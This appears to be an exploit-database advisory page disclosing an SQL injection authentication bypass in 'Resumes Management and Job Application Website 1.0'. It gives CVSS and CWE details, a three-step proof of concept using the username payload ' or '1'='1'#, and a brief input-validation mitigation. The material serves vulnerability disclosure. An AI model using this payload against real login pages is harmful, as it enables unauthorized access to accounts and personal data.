header-logo
Suggest Exploit
vendor:
Resumes Management and Job Application Website
by:
Kshitiz Raj (manitorpotterk)
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Resumes Management and Job Application Website
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: NO
Related CWE: N/A
CPE: a:egavilanmedia:resumes_management_and_job_application_website
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 10/Kali Linux
2020

Resumes Management and Job Application Website 1.0 – Authentication Bypass (Sql Injection)

An attacker can bypass authentication by entering ' or '1'='1'# as the username and any value as the password in the login page of the Resumes Management and Job Application Website 1.0.

Mitigation:

Input validation should be used to prevent SQL injection attacks.
Source

Exploit-DB raw data:

# Exploit Title: Resumes Management and Job Application Website 1.0 - Authentication Bypass (Sql Injection)
# Date: 2020-12-27
# Exploit Author: Kshitiz Raj (manitorpotterk)
# Vendor Homepage: http://egavilanmedia.com
# Software Link: https://egavilanmedia.com/resumes-management-and-job-application-website/
# Version: 1.0
# Tested on: Windows 10/Kali Linux

Step 1 -  Go to url http://localhost/Resumes/login.html
Step 2 - Enter Username :-   ' or '1'='1'#
Step 3 -  Enter Password -   anything

Navigation

Suggest Exploit

Services By CQR